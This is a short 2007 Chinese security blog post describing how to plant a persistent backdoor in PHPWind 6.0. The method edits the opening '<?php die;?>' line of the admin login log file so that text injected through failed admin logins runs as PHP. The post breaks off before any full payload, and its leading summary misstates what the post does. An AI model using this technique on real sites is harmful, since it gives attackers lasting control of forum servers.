本文介绍了一种针对 PHPWind 论坛系统的后门植入方法,通过编辑 admin_record.php 文件绕过原有防御机制,实现非法访问记录的篡改。
by superhei
2007-10-08
http://www.ph4nt0m.org
Text Mode
pw的一个放后门的方式
data/bbscache/admin_record.php是记录后台登陆和操作的,我们看看是怎么操作这个文件的:
admin/admincp.php:
$bbsrecordfile
=
D_P
.
"
data/bbscache/admin_record.php
"
;
if ( ! file_exists ( $bbsrecordfile )){
writeover( $bbsrecordfile , " <?php die;?>/n " );
} // 这个if只是说如果不存在admin_record.php 就用代码生成一个
if ( ! file_exists ( $bbsrecordfile )){
writeover( $bbsrecordfile , " <?php die;?>/n " );
} // 这个if只是说如果不存在admin_record.php 就用代码生成一个
如果我们只是编辑admin_record.php 把
<?
php
die
;
?>
这个给删除呢 :)
我们看下我们的代码杂写入admin_record.php的
你在后台登陆http://localhost/PHPWind_GBK_6.0RC/upload/admin.php
随便用个错误的用户登陆 就会有如下记录:
|admin|s|Logging Failed|127.0.0.1|1191667510|
呵呵 所以我们可以通过这个写入我们的代码,不过这里是有过滤的 不可以用<
所以我们的后门应该这样留:
<?
php
die
;
?>
改为
<?
php
/*
die;?>
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
